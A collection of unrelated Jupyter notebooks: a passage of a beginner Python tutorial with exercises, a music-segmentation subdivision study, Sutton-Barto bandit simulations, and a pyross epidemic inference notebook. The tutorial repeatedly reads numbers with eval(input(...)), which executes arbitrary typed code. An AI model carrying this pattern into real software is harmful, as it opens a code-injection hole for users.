def go(num):
    os.system('echo hahah')
print = go  # rebinding the name print shadows the built-in function
print(12)
```
## Variables, assignment statements and assignment expressions
- Variable: informally, a quantity whose value can change
- x = 2 \* x + 1 is an equation in mathematics, but in a programming language it is an assignment expression
- test = test + 1 \* a variable must already have a value before it appears on the right-hand side of an assignment
```
x = 100
x = 2 * x + 1  # assignment statement; the variable must have a value before being assigned to
print(x)
a = eval(input('Enter a number'))
print(type(a))
print(a * 3)
```
## Simultaneous assignment
var1, var2, var3... = exp1, exp2, exp3...
```
Joekr, Mistt,hahah,lalal = 'lalal',120,120.33333,True
print(Joekr,Mistt,hahah,lalal)
```
## Defining constants
- Constant: an identifier for a fixed value, suited to values used many times, e.g. PI
- Note: in many other languages a defined constant cannot be changed afterwards, but in Python everything is an object, so a 'constant' can still be reassigned
```
chart = 100.1
chart = 'hahahah'
chart = True
print(chart)
import math
print(math.pi)
```
## Numeric data types and operators
- Python has two numeric types (int and float), which support addition, subtraction, multiplication, division, modulo and exponentiation
<img src = "../Photo/01.jpg"></img>
## The /, //, ** operators
```
number1 = 100
number2 = 500
print(number1 + number2)
number3 = 100.0
number4 = 500.0
print(number3 + number4)
number3 = 100.0
number4 = 500.0
print(number3 - number4)
number3 = 100.0
number4 = 500.0
print(number3 * number4)
number3 = 100.0
number4 = 500.0
print(number3 / number4)
number3 = 100.0
number4 = 500.0
print(number3 // number4)
number3 = 100.0
number4 = 2
print(number3 ** number4)
```
## The % operator
```
number3 = 100.0
number4 = 500.0
print(number3 % number4)
```
## EP:
- What is 25/4, and how would you rewrite it to get an integer result?
- Read a number and determine whether it is odd or even
- Advanced: read a number of seconds and convert it to minutes and seconds, e.g. 500 seconds equals 8 minutes 20 seconds
- Advanced: if today is Saturday, what day of the week will it be 10 days later? Hint: day 0 of each week is Sunday
```
res = 25 // 4
print(res)
input_number = input('input number')
input_number_int = eval(input_number)
# isinstance checks the type; comparing the value to the type int is always False
if isinstance(input_number_int, int):
    if input_number_int % 2 == 0:
        print('even')
    else:
        print('odd')
else:
    if input_number_int % 2.0 == 0.0:
        print('even')
    else:
        print('odd')
time = eval(input('Enter a number of seconds'))
fen = time // 60  # minutes
miao = time % 60  # seconds
print(fen, 'minutes', miao, 'seconds')
print('%d min %d sec' % (fen, miao))
time1 = 6  # Saturday (day 0 is Sunday)
time2 = eval(input('Enter a number of days'))
result = (time1 + time2) % 7
print(result)
```
## Scientific notation
- 1.234e+2
- 1.234e-2
```
num1=1.234e+2
num2 = 1.234e-2
print(num1,num2)
```
## Evaluating expressions and operator precedence
<img src = "../Photo/02.png"></img>
<img src = "../Photo/03.png"></img>
```
x = eval(input('x'))
y = eval(input('y'))
a = eval(input('a'))
b = eval(input('b'))
c = eval(input('c'))
part_1 = (3 + 4 * x) / 5
part_2 = (10 * (y-5)* (a+b+c))/ x
part_3 = 9*(4/x + (9+x)/y)
print(part_1 - part_2 + part_3)
```
## Augmented assignment operators
<img src = "../Photo/04.png"></img>
```
a = 1
a += 100 # a = a + 100
print(a)
```
## Type conversion
- float -> int
- rounding: round
```
int(25 / 4)       # convert to an integer
str(25 / 4)       # convert to a string
float(25 // 5)    # convert to a float
round(25 / 4, 1)  # round to one decimal place
```
## EP:
- If the annual business tax rate is 0.06%, how much tax is due on an annual income of 197.55e+2? (round the result to 2 decimal places)
- Scientific notation must be used
```
# Narcissistic-number check: 153 equals the sum of the cubes of its digits
water_flower = 153
bai = 153 // 100      # hundreds digit
shi = 153 // 10 % 10  # tens digit
ge = 153 % 10         # ones digit
if water_flower == bai ** 3 + shi ** 3 + ge ** 3:
    print('narcissistic number')
else:
    print('NO')
# The tax EP, using scientific notation
round(197.55e+2 * 0.06e-2, 2)
```
# Project
- Write a loan calculator program in Python: the input is the monthly payment (monthlyPayment) and the output is the total repayment (totalPayment)

```
贷款数 = eval(input('Please enter the loan amount'))  # loan amount
月利率 = eval(input('Monthly interest rate'))  # monthly interest rate
年限 = eval(input('Term in years'))  # term in years
月供 = (贷款数 * 月利率) / (1 - (1 / (1 + 月利率) ** (年限 * 12)))  # monthly payment
总还款数 = 月供 * 年限 * 12  # total repayment
print(总还款数)
import time
print(time.time())
```
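For readers who prefer ASCII identifiers, here is the same annuity formula with English variable names and example inputs in place of `input()` (the numbers are only an illustration):

```python
# Example inputs instead of interactive input()
loan_amount = 100000.0
monthly_rate = 0.005  # e.g. a 6% annual rate divided by 12
years = 10

# Standard annuity formula for the fixed monthly payment
monthly_payment = (loan_amount * monthly_rate) / (1 - (1 + monthly_rate) ** (-years * 12))
total_payment = monthly_payment * years * 12
print(round(monthly_payment, 2), round(total_payment, 2))
```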
# Homework
- 1
<img src="../Photo/06.png"></img>
```
celsius = eval(input("Enter the temperature in Celsius"))
fahrenheit = (9 / 5) * celsius + 32
print(fahrenheit)
```
- 2
<img src="../Photo/07.png"></img>
```
pi = 3.14
radius = eval(input("enter the radius"))
length = eval(input("enter the height"))
area = radius * radius * pi
volume = area * length
print(area)
print(volume)
```
- 3
<img src="../Photo/08.png"></img>
```
yingchi = eval(input("enter a length in feet"))
michi = yingchi * 0.305  # meters
print(michi)
```
- 4
<img src="../Photo/10.png"></img>
```
water_amount = eval(input("enter the amount of water (kg)"))
temperature_ini = eval(input("enter the initial temperature"))
temperature_fin = eval(input("enter the final temperature"))
Q = water_amount * (temperature_fin - temperature_ini) * 4184
print(Q)
```
- 5
<img src="../Photo/11.png"></img>
```
差额 = eval(input("enter the balance"))
年利率 = eval(input("enter the annual interest rate"))
利息 = 差额 * (年利率 / 1200)  # monthly interest
print(利息)
```
- 6
<img src="../Photo/12.png"></img>
```
v0=eval(input("v0"))
v1=eval(input("v1"))
t=eval(input("t"))
a=(v1-v0)/t
print(a)
```
- 7 (advanced)
<img src="../Photo/13.png"></img>
```
月存额 = eval(input("monthly deposit"))
第一个月 = 月存额 * (1 + 0.05 / 12)
print("after the first month the account holds:", 第一个月)
第二个月 = (月存额 + 第一个月) * (1 + 0.05 / 12)
print("after the second month the account holds:", 第二个月)
```
- 8 (advanced)
<img src="../Photo/14.png"></img>
|
github_jupyter
|
```
import musicntd.scripts.hide_code as hide
```
# From padding to subdivision
As mentioned in the first notebook, in previous experiments every bar of the tensor was zero-padded if it was shorter than the longest bar of the song.
This fix is not satisfactory, as it creates null artifacts at the end of most slices of the tensor.
## Description of the subdivision method
Instead, we decided to over-sample the chromagram (32-sample hop) and then select the same number of frames in each bar. Rather than having equally spaced frames across all bars of the tensor, which resulted in slices of unequal sizes (before padding), we now compute bar-chromagrams with the same number of frames, which is a parameter to be set. Within each bar-chromagram, frames are almost* equally spaced, but the gap between two consecutive frames can now differ between bars.
We call the **subdivision** of bars the number of frames we select in each bar. This parameter must be set, and we will try to determine a good value for it in the next part of this notebook.
Concretely, let's consider the chromagram of a particular bar, starting at time $t_0$ and ending at time $t_1$. This chromagram contains $n = (t_1 - t_0 + 1) * \frac{s_r}{32}$ frames, with $s_r$ the sampling rate. In this chromagram, given a subdivision $sub$, we select the frames at indexes $\{k * \frac{n}{sub}$ for $k \in [0, sub[$ and $k$ integer$\}$. As indexes need to be integers, we round the preceding expression.
*almost, because of the rounding operation presented above
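The index-selection rule above can be sketched in a few lines (`bar_frame_indexes` is a hypothetical helper for illustration, not taken from the codebase):

```python
def bar_frame_indexes(n, sub):
    # select `sub` (almost) equally spaced frame indexes in a bar of n frames,
    # rounding k * n / sub for k = 0, ..., sub - 1
    return [round(k * n / sub) for k in range(sub)]

# e.g. a bar of 1000 frames at subdivision 96
indexes = bar_frame_indexes(1000, 96)
```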
# Setting the subdivision parameter
We will test three values for the subdivision parameter:
- 96 (24 frames per beat, assuming 4 beats per bar),
- 128 (32 frames per beat),
- 192 (48 frames per beat).
We will test the segmentation on the entire RWC Popular dataset, with MIREX10 annotations, and by testing several ranks (16,24,32,40) for $H$ and $Q$.
Note that, due to the conclusion in Notebook 2, we now have fixed $W$ to the 12-size identity matrix.
```
# Define the annotation type
annotations_type = "MIREX10"
ranks_rhythm = [16,24,32,40]
ranks_pattern = [16,24,32,40]
```
## Subdivision 96
### Fixed ranks
Below are the segmentation results with the subdivision fixed to 96, for the different rank values, on the RWC Pop dataset.
Results are computed with tolerances of 0.5 and 3 seconds respectively.
```
zero_five_nine, three_nine = hide.compute_ranks_RWC(ranks_rhythm,ranks_pattern, W = "chromas", annotations_type = annotations_type,
subdivision=96, penalty_weight = 1)
```
### Oracle ranks
In this condition, we only keep the ranks leading to the highest F measure.
In that sense, it's an optimistic upper bound on metrics.
```
hide.printmd("**At 0.5 seconds:**")
best_chr_zero_five = hide.best_f_one_score_rank(zero_five_nine)
hide.printmd("**At 3 seconds:**")
best_chr_three = hide.best_f_one_score_rank(three_nine)
```
Below is the distribution of the optimal ranks in the "oracle ranks" condition, _i.e._ the ranks for $H$ and $Q$ that yield the highest F measure for each song.
```
hide.plot_3d_ranks_study(zero_five_nine, ranks_rhythm, ranks_pattern)
```
Below is the histogram of the F measures obtained with the oracle ranks.
```
hide.plot_f_mes_histogram(zero_five_nine)
```
Finally, here are the 5 worst songs in terms of F measure in this condition.
```
hide.return_worst_songs(zero_five_nine, 5)
```
## Subdivision 128
### Fixed ranks
Below are the segmentation results with the subdivision fixed to 128, for the different rank values, on the RWC Pop dataset.
Results are computed with tolerances of 0.5 and 3 seconds respectively.
```
zero_five_cent, three_cent = hide.compute_ranks_RWC(ranks_rhythm,ranks_pattern, W = "chromas", annotations_type = annotations_type,
subdivision=128, penalty_weight = 1)
```
### Oracle ranks
In this condition, we only keep the ranks leading to the highest F measure.
In that sense, it's an optimistic upper bound.
```
hide.printmd("**At 0.5 seconds:**")
best_chr_zero_five = hide.best_f_one_score_rank(zero_five_cent)
hide.printmd("**At 3 seconds:**")
best_chr_three = hide.best_f_one_score_rank(three_cent)
```
Below is the distribution of the optimal ranks in the "oracle ranks" condition, _i.e._ the ranks for $H$ and $Q$ that yield the highest F measure for each song.
```
hide.plot_3d_ranks_study(zero_five_cent, ranks_rhythm, ranks_pattern)
```
Below is the histogram of the F measures obtained with the oracle ranks.
```
hide.plot_f_mes_histogram(zero_five_cent)
```
Finally, here are the 5 worst songs in terms of F measure in this condition.
```
hide.return_worst_songs(zero_five_cent, 5)
```
## Subdivision 192
### Fixed ranks
Below are the segmentation results with the subdivision fixed to 192, for the different rank values, on the RWC Pop dataset.
Results are computed with tolerances of 0.5 and 3 seconds respectively.
```
zero_five_hunnine, three_hunnine = hide.compute_ranks_RWC(ranks_rhythm,ranks_pattern, W = "chromas", annotations_type = annotations_type,
subdivision=192, penalty_weight = 1)
```
### Oracle ranks
In this condition, we only keep the ranks leading to the highest F measure.
In that sense, it's an optimistic upper bound.
```
hide.printmd("**At 0.5 seconds:**")
best_chr_zero_five = hide.best_f_one_score_rank(zero_five_hunnine)
hide.printmd("**At 3 seconds:**")
best_chr_three = hide.best_f_one_score_rank(three_hunnine)
```
Below is the distribution of the optimal ranks in the "oracle ranks" condition, _i.e._ the ranks for $H$ and $Q$ that yield the highest F measure for each song.
```
hide.plot_3d_ranks_study(zero_five_hunnine, ranks_rhythm, ranks_pattern)
```
Below is the histogram of the F measures obtained with the oracle ranks.
```
hide.plot_f_mes_histogram(zero_five_hunnine)
```
Finally, here are the 5 worst songs in terms of F measure in this condition.
```
hide.return_worst_songs(zero_five_hunnine, 5)
```
# Conclusion
We did not find the differences in segmentation results to be significant.
We therefore concluded that the three tested subdivisions were equally satisfactory for our experiments, and we decided to continue with the **96** subdivision only, as it is the smallest tested value, which reduces computation time and complexity.
96 also has the advantage (compared to 128) of being divisible by both 3 and 4, the most common numbers of beats per bar in western pop music (even though, for now, we have restricted our study to music with 4 beats per bar).
```
#######################################################################
# Copyright (C) #
# 2016-2018 Shangtong Zhang(zhangshangtong.cpp@gmail.com) #
# 2016 Tian Jun(tianjun.cpp@gmail.com) #
# 2016 Artem Oboturov(oboturov@gmail.com) #
# 2016 Kenta Shimada(hyperkentakun@gmail.com) #
# Permission given to modify the code as long as you keep this #
# declaration at the top #
#######################################################################
import matplotlib.pyplot as plt
%matplotlib inline
import numpy as np
from tqdm import tqdm
class Bandit:
# @k_arm: # of arms
# @epsilon: probability for exploration in epsilon-greedy algorithm
# @initial: initial estimation for each action
# @step_size: constant step size for updating estimations
# @sample_averages: if True, use sample averages to update estimations instead of constant step size
# @UCB_param: if not None, use UCB algorithm to select action
# @gradient: if True, use gradient based bandit algorithm
# @gradient_baseline: if True, use average reward as baseline for gradient based bandit algorithm
def __init__(self, k_arm=10, epsilon=0., initial=0., step_size=0.1, sample_averages=False, UCB_param=None,
gradient=False, gradient_baseline=False, true_reward=0.):
self.k = k_arm
self.step_size = step_size
self.sample_averages = sample_averages
self.indices = np.arange(self.k)
self.time = 0
self.UCB_param = UCB_param
self.gradient = gradient
self.gradient_baseline = gradient_baseline
self.average_reward = 0
self.true_reward = true_reward
self.epsilon = epsilon
self.initial = initial
def reset(self):
# real reward for each action
self.q_true = np.random.randn(self.k) + self.true_reward
# estimation for each action
self.q_estimation = np.zeros(self.k) + self.initial
# # of chosen times for each action
self.action_count = np.zeros(self.k)
self.best_action = np.argmax(self.q_true)
# get an action for this bandit
def act(self):
if np.random.rand() < self.epsilon:
return np.random.choice(self.indices)
if self.UCB_param is not None:
UCB_estimation = self.q_estimation + \
self.UCB_param * np.sqrt(np.log(self.time + 1) / (self.action_count + 1e-5))
q_best = np.max(UCB_estimation)
return np.random.choice([action for action, q in enumerate(UCB_estimation) if q == q_best])
if self.gradient:
exp_est = np.exp(self.q_estimation)
self.action_prob = exp_est / np.sum(exp_est)
return np.random.choice(self.indices, p=self.action_prob)
return np.argmax(self.q_estimation)
# take an action, update estimation for this action
def step(self, action):
# generate the reward under N(real reward, 1)
reward = np.random.randn() + self.q_true[action]
self.time += 1
self.average_reward = (self.time - 1.0) / self.time * self.average_reward + reward / self.time
self.action_count[action] += 1
if self.sample_averages:
# update estimation using sample averages
self.q_estimation[action] += 1.0 / self.action_count[action] * (reward - self.q_estimation[action])
elif self.gradient:
one_hot = np.zeros(self.k)
one_hot[action] = 1
if self.gradient_baseline:
baseline = self.average_reward
else:
baseline = 0
self.q_estimation = self.q_estimation + self.step_size * (reward - baseline) * (one_hot - self.action_prob)
else:
# update estimation with constant step size
self.q_estimation[action] += self.step_size * (reward - self.q_estimation[action])
return reward
def simulate(runs, time, bandits):
best_action_counts = np.zeros((len(bandits), runs, time))
rewards = np.zeros(best_action_counts.shape)
for i, bandit in enumerate(bandits):
for r in tqdm(range(runs)):
bandit.reset()
for t in range(time):
action = bandit.act()
reward = bandit.step(action)
rewards[i, r, t] = reward
if action == bandit.best_action:
best_action_counts[i, r, t] = 1
best_action_counts = best_action_counts.mean(axis=1)
rewards = rewards.mean(axis=1)
return best_action_counts, rewards
def figure_2_1():
plt.violinplot(dataset=np.random.randn(200,10) + np.random.randn(10))
plt.xlabel("Action")
plt.ylabel("Reward distribution")
plt.show()
figure_2_1()
def figure_2_2(runs=2000, time=1000):
epsilons = [0, 0.1, 0.01]
bandits = [Bandit(epsilon=eps, sample_averages=True) for eps in epsilons]
best_action_counts, rewards = simulate(runs, time, bandits)
plt.figure(figsize=(10, 20))
plt.subplot(2, 1, 1)
for eps, reward_curve in zip(epsilons, rewards):
plt.plot(reward_curve, label='epsilon = %.02f' % (eps))
plt.xlabel('steps')
plt.ylabel('average reward')
plt.legend()
plt.subplot(2, 1, 2)
for eps, counts in zip(epsilons, best_action_counts):
plt.plot(counts, label='epsilon = %.02f' % (eps))
plt.xlabel('steps')
plt.ylabel('% optimal action')
plt.legend()
plt.show()
figure_2_2()
def figure_2_3(runs=2000, time=1000):
bandits = []
bandits.append(Bandit(epsilon=0, initial=5, step_size=0.1))
bandits.append(Bandit(epsilon=0.1, initial=0, step_size=0.1))
best_action_counts, _ = simulate(runs, time, bandits)
plt.plot(best_action_counts[0], label='epsilon = 0, q = 5')
plt.plot(best_action_counts[1], label='epsilon = 0.1, q = 0')
plt.xlabel('Steps')
plt.ylabel('% optimal action')
plt.legend()
plt.show()
figure_2_3()
def figure_2_4(runs=2000, time=1000):
bandits = []
bandits.append(Bandit(epsilon=0, UCB_param=2, sample_averages=True))
bandits.append(Bandit(epsilon=0.1, sample_averages=True))
_, average_rewards = simulate(runs, time, bandits)
plt.plot(average_rewards[0], label='UCB c = 2')
plt.plot(average_rewards[1], label='epsilon greedy epsilon = 0.1')
plt.xlabel('Steps')
plt.ylabel('Average reward')
plt.legend()
plt.show()
figure_2_4()
def figure_2_5(runs=2000, time=1000):
bandits = []
bandits.append(Bandit(gradient=True, step_size=0.1, gradient_baseline=True, true_reward=4))
bandits.append(Bandit(gradient=True, step_size=0.1, gradient_baseline=False, true_reward=4))
bandits.append(Bandit(gradient=True, step_size=0.4, gradient_baseline=True, true_reward=4))
bandits.append(Bandit(gradient=True, step_size=0.4, gradient_baseline=False, true_reward=4))
best_action_counts, _ = simulate(runs, time, bandits)
labels = ['alpha = 0.1, with baseline',
'alpha = 0.1, without baseline',
'alpha = 0.4, with baseline',
'alpha = 0.4, without baseline']
for i in range(0, len(bandits)):
plt.plot(best_action_counts[i], label=labels[i])
plt.xlabel('Steps')
plt.ylabel('% Optimal action')
plt.legend()
plt.show()
figure_2_5()
def figure_2_6(runs=2000, time=1000):
labels = ['epsilon-greedy', 'gradient bandit',
'UCB', 'optimistic initialization']
generators = [lambda epsilon: Bandit(epsilon=epsilon, sample_averages=True),
lambda alpha: Bandit(gradient=True, step_size=alpha, gradient_baseline=True),
lambda coef: Bandit(epsilon=0, UCB_param=coef, sample_averages=True),
lambda initial: Bandit(epsilon=0, initial=initial, step_size=0.1)]
parameters = [np.arange(-7, -1, dtype=float),
np.arange(-5, 2, dtype=float),
np.arange(-4, 3, dtype=float),
np.arange(-2, 3, dtype=float)]
bandits = []
for generator, parameter in zip(generators, parameters):
for param in parameter:
bandits.append(generator(pow(2, param)))
_, average_rewards = simulate(runs, time, bandits)
rewards = np.mean(average_rewards, axis=1)
i = 0
for label, parameter in zip(labels, parameters):
l = len(parameter)
plt.plot(parameter, rewards[i:i+l], label=label)
i += l
plt.xlabel('Parameter(2^x)')
plt.ylabel('Average reward')
plt.legend()
plt.show()
figure_2_6()
```
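As a sanity check on the sample-average update used in `Bandit.step` (`Q += (R - Q) / n`), the incremental form reproduces the ordinary batch mean; this stand-alone snippet is independent of the class above:

```python
import numpy as np

rng = np.random.default_rng(0)
rewards = rng.normal(size=100)

# incremental sample-average update, one reward at a time
q, n = 0.0, 0
for r in rewards:
    n += 1
    q += (r - q) / n

# the running estimate equals the batch mean
assert np.isclose(q, rewards.mean())
print(q)
```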
## Inference in a simple model using synthetic data
Population size 10^6, inference window 2x4 = 8 days; to be compared with the analogous ``-win5`` notebook.
```
%env OMP_NUM_THREADS=1
%matplotlib inline
import numpy as np
import os
import pickle
import pprint
import time
import pyross
import matplotlib.pyplot as plt
import matplotlib.image as mpimg
#from matplotlib import rc; rc('text', usetex=True)
import synth_fns
```
(cell 3 was removed to hide local file info)
### main settings
```
## for dataFiles : needs a fresh value in every notebook
fileRoot = 'dataSynthInfTest-pop1e6-win2'
## total population
popN = 1e6
## tau-leaping param, take this negative to force gillespie
## or set a small value for high-accuracy tau-leap (eg 1e-4 or 1e-5)
leapEps = -1
## do we use small tolerances for the likelihood computations? (use False for debug etc)
isHighAccuracy = True
# absolute tolerance for logp for MAP
inf_atol = 1.0
## prior mean of beta, divided by true value (set to 1.0 for the simplest case)
betaPriorOffset = 0.8
betaPriorLogNorm = False
## mcmc
mcSamples = 5000
nProcMCMC = 2 # None ## take None to use default but large numbers are not efficient in this example
trajSeed = 18
infSeed = 21
mcSeed = infSeed+2
loadTraj = False
saveMC = True
```
### model
```
model_dict = synth_fns.get_model(popN)
model_spec = model_dict['mod']
contactMatrix = model_dict['CM']
parameters_true = model_dict['params']
cohortsM = model_dict['cohortsM']
Ni = model_dict['cohortsPop']
```
#### more settings
```
## total trajectory time (bare units)
Tf_bare = 20
## total inf time
Tf_inf_bare = 2
## inference period starts when the total deaths reach this amount (as a fraction)
fracDeaths = 2e-3 # int(N*200/1e5)
## hack to get higher-frequency data
## how many data points per "timestep" (in original units)
fineData = 4
## this assumes that all parameters are rates !!
for key in parameters_true:
#print(key,parameters_true[key])
parameters_true[key] /= fineData
Tf = Tf_bare * fineData;
Nf = Tf+1
Tf_inference = Tf_inf_bare * fineData
Nf_inference = Tf_inference+1
```
### plotting helper functions
```
def plotTraj(M,data_array,Nf_start,Tf_inference,fineData):
fig = plt.figure(num=None, figsize=(6, 4), dpi=80, facecolor='w', edgecolor='k')
#plt.rc('text', usetex=True)
plt.rc('font', family='serif', size=12)
t = np.linspace(0, Tf/fineData, Nf)
# plt.plot(t, np.sum(data_array[:, :M], axis=1), '-o', label='S', lw=4)
plt.plot(t, np.sum(data_array[:, M:2*M], axis=1), '-o', label='Exposed', lw=2)
plt.plot(t, np.sum(data_array[:, 2*M:3*M], axis=1), '-o', label='Infected', lw=2)
plt.plot(t, np.sum(data_array[:, 3*M:4*M], axis=1), '-o', label='Deaths', lw=2)
#plt.plot(t, N-np.sum(data_array[:, 0:4*M], axis=1), '-o', label='Rec', lw=2)
plt.axvspan(Nf_start/fineData, (Nf_start+Tf_inference)/fineData,alpha=0.3, color='dodgerblue')
plt.legend()
plt.show()
fig,axs = plt.subplots(1,2, figsize=(12, 5), dpi=80, facecolor='w', edgecolor='k')
ax = axs[0]
ax.plot(t[1:],np.diff(np.sum(data_array[:, 3*M:4*M], axis=1)),'o-',label='death increments', lw=1)
ax.legend(loc='upper right') ; # plt.show()
ax = axs[1]
ax.plot(t,np.sum(data_array[:, 3*M:4*M], axis=1),'o-',label='deaths',ms=3)
ax.legend() ;
plt.show()
def plotMAP(res,data_array,M,N,estimator,Nf_start,Tf_inference,fineData):
print('**beta(bare units)',res['params_dict']['beta']*fineData)
print('**logLik',res['log_likelihood'],'true was',logpTrue)
print('\n')
print(res)
fig,axs = plt.subplots(1,3, figsize=(15, 7), dpi=80, facecolor='w', edgecolor='k')
plt.subplots_adjust(wspace=0.3)
#plt.rc('text', usetex=True)
plt.rc('font', family='serif', size=12)
t = np.linspace(0, Tf/fineData, Nf)
ax = axs[0]
#plt.plot(t, np.sum(data_array[:, :M], axis=1), '-o', label='S', lw=4)
ax.plot(t, np.sum(data_array[:, M:2*M], axis=1), 'o', label='Exposed', lw=2)
ax.plot(t, np.sum(data_array[:, 2*M:3*M], axis=1), 'o', label='Infected', lw=2)
ax.plot(t, np.sum(data_array[:, 3*M:4*M], axis=1), 'o', label='Deaths', lw=2)
#plt.plot(t, N-np.sum(data_array[:, 0:4*M], axis=1), '-o', label='Rec', lw=2)
tt = np.linspace(Nf_start, Tf, Nf-Nf_start,)/fineData
xm = estimator.integrate(res['x0'], Nf_start, Tf, Nf-Nf_start, dense_output=False)
#plt.plot(tt, np.sum(xm[:, :M], axis=1), '-x', label='S-MAP', lw=2, ms=3)
ax.plot(tt, np.sum(xm[:, M:2*M], axis=1), '-x', color='C0',label='E-MAP', lw=2, ms=3)
ax.plot(tt, np.sum(xm[:, 2*M:3*M], axis=1), '-x', color='C1',label='I-MAP', lw=2, ms=3)
ax.plot(tt, np.sum(xm[:, 3*M:4*M], axis=1), '-x', color='C2',label='D-MAP', lw=2, ms=3)
#plt.plot(tt, N-np.sum(xm[:, :4*M], axis=1), '-o', label='R-MAP', lw=2)
ax.axvspan(Nf_start/fineData, (Nf_start+Tf_inference)/fineData,alpha=0.3, color='dodgerblue')
ax.legend()
ax = axs[1]
ax.plot(t[1:], np.diff(np.sum(data_array[:, 3*M:4*M], axis=1)), '-o', label='death incs', lw=2)
ax.plot(tt[1:], np.diff(np.sum(xm[:, 3*M:4*M], axis=1)), '-x', label='MAP', lw=2, ms=3)
ax.axvspan(Nf_start/fineData, (Nf_start+Tf_inference)/fineData,alpha=0.3, color='dodgerblue')
ax.legend()
ax = axs[2]
ax.plot(t, np.sum(data_array[:, :M], axis=1), '-o', label='Sus', lw=1.5, ms=3)
#plt.plot(t, np.sum(data_array[:, M:2*M], axis=1), '-o', label='Exposed', lw=2)
#plt.plot(t, np.sum(data_array[:, 2*M:3*M], axis=1), '-o', label='Infected', lw=2)
#plt.plot(t, np.sum(data_array[:, 3*M:4*M], axis=1), '-o', label='Deaths', lw=2)
ax.plot(t, N-np.sum(data_array[:, 0:4*M], axis=1), '-o', label='Rec', lw=1.5, ms=3)
#infResult = res
tt = np.linspace(Nf_start, Tf, Nf-Nf_start,)/fineData
xm = estimator.integrate(res['x0'], Nf_start, Tf, Nf-Nf_start, dense_output=False)
ax.plot(tt, np.sum(xm[:, :M], axis=1), '-x', label='S-MAP', lw=2, ms=3)
#plt.plot(tt, np.sum(xm[:, M:2*M], axis=1), '-x', label='E-MAP', lw=2, ms=3)
#plt.plot(tt, np.sum(xm[:, 2*M:3*M], axis=1), '-x', label='I-MAP', lw=2, ms=3)
#plt.plot(tt, np.sum(xm[:, 3*M:4*M], axis=1), '-x', label='D-MAP', lw=2, ms=3)
ax.plot(tt, N-np.sum(xm[:, :4*M], axis=1), '-x', label='R-MAP', lw=1.5, ms=3)
ax.axvspan(Nf_start/fineData, (Nf_start+Tf_inference)/fineData,alpha=0.3, color='dodgerblue')
ax.legend()
plt.show()
def plotMCtrace(selected_dims, sampler, numTrace=None):
# Plot the trace for these dimensions:
plot_dim = len(selected_dims)
plt.rcParams.update({'font.size': 14})
fig, axes = plt.subplots(plot_dim, figsize=(12, plot_dim), sharex=True)
samples = sampler.get_chain()
if numTrace is None : numTrace = np.shape(samples)[1] ## corrected index
for ii,dd in enumerate(selected_dims):
ax = axes[ii]
ax.plot(samples[:, :numTrace , dd], "k", alpha=0.3)
ax.set_xlim(0, len(samples))
axes[-1].set_xlabel("step number");
plt.show(fig)
plt.close()
def plotPosteriors(estimator,obsData, fltrDeath, Tf_inference,param_priors, init_priors,contactMatrix,
infResult,parameters_true,trueInit) :
## used for prior pdfs
(likFun,priFun,dimFlat) = pyross.evidence.latent_get_parameters(estimator,
obsData, fltrDeath, Tf_inference,
param_priors, init_priors,
contactMatrix,
#intervention_fun=interventionFn,
tangent=False,
)
xVals = np.linspace(parameters_true['beta']*0.5,parameters_true['beta']*1.5,100)
betas = [ rr['params_dict']['beta'] for rr in result_mcmc ]
plt.hist(betas,density=True,color='lightblue',label='posterior')
yVal=2
plt.plot([infResult['params_dict']['beta']],[2*yVal],'bs',label='MAP',ms=10)
plt.plot([parameters_true['beta']],[yVal],'ro',label='true',ms=10)
## this is a bit complicated, it just finds the prior for beta from the infResult
var='beta'
jj = infResult['param_keys'].index(var)
xInd = infResult['param_guess_range'][jj]
#print(jj,xInd)
pVals = []
for xx in xVals :
flatP = np.zeros( dimFlat )
flatP[xInd] = xx
pdfAll = np.exp( priFun.logpdf(flatP) )
pVals.append( pdfAll[xInd] )
plt.plot(xVals,pVals,color='darkgreen',label='prior')
plt.xlabel(var)
plt.ylabel('pdf')
plt.legend()
labs=['init S','init E','init I']
nPanel=3
fig,axs = plt.subplots(1,nPanel,figsize=(14,4))
for ii in range(nPanel) :
ax = axs[ii]
yVal=1.0/popN
xs = [ rr['x0'][ii] for rr in result_mcmc ]
ax.hist(xs,color='lightblue',density=True)
ax.plot([infResult['x0'][ii]],yVal,'bs',label='MAP')
ax.plot([trueInit[ii]],yVal,'ro',label='true')
## analogous to the beta case above: find the prior for this initial condition
## axis ranges
xMin = np.min(xs)*0.8
xMax = np.max(xs)*1.2
xVals = np.linspace(xMin,xMax,100)
## this ID is a negative number because the init params are the end of the 'flat' param array
paramID = ii-nPanel
pVals = []
for xx in xVals :
flatP = np.zeros( dimFlat )
flatP[paramID] = xx
pdfAll = np.exp( priFun.logpdf(flatP) )
pVals.append( pdfAll[paramID] )
ax.plot(xVals,pVals,color='darkgreen',label='prior')
#plt.xlabel(var)
ax.set_xlabel(labs[ii])
ax.set_ylabel('pdf')
ax.yaxis.set_ticklabels([])
plt.show()
```
### synthetic data
```
if loadTraj :
ipFile = fileRoot+'-stochTraj.npy'
syntheticData = np.load(ipFile)
print('loading trajectory from',ipFile)
else :
ticTime = time.time()
syntheticData = synth_fns.make_stochastic_traj(Tf,Nf,trajSeed,model_dict,leapEps)
tocTime = time.time() - ticTime
print('traj generation time',tocTime,'secs')
np.save(fileRoot+'-stochTraj.npy',syntheticData)
Nf_start = synth_fns.get_start_time(syntheticData, popN, fracDeaths)
print('inf starts at timePoint',Nf_start)
plotTraj(cohortsM,syntheticData,Nf_start,Tf_inference,fineData)
```
### basic inference (estimator) setup
(including computation of likelihood for the true parameters)
```
[estimator,fltrDeath,obsData,trueInit] = synth_fns.get_estimator(isHighAccuracy,model_dict,syntheticData, popN, Nf_start, Nf_inference,)
## compute log-likelihood of true params
logpTrue = -estimator.minus_logp_red(parameters_true, trueInit, obsData, fltrDeath, Tf_inference,
contactMatrix, tangent=False)
print('**logLikTrue',logpTrue,'\n')
print('death data\n',obsData,'length',np.size(obsData),Nf_inference)
```
### priors
```
[param_priors,init_priors] = synth_fns.get_priors(model_dict,betaPriorOffset,betaPriorLogNorm,fracDeaths,estimator)
print('Prior Params:',param_priors)
print('Prior Inits:')
pprint.pprint(init_priors)
print('trueBeta',parameters_true['beta'])
print('trueInit',trueInit)
```
### inference (MAP)
```
infResult = synth_fns.do_inf(estimator, obsData, fltrDeath, syntheticData,
popN, Tf_inference, infSeed, param_priors,init_priors, model_dict, inf_atol)
#pprint.pprint(infResult)
print('MAP likelihood',infResult['log_likelihood'],'true',logpTrue)
print('MAP beta',infResult['params_dict']['beta'],'true',parameters_true['beta'])
```
### plot MAP trajectory
```
plotMAP(infResult,syntheticData,cohortsM,popN,estimator,Nf_start,Tf_inference,fineData)
```
#### slice of likelihood
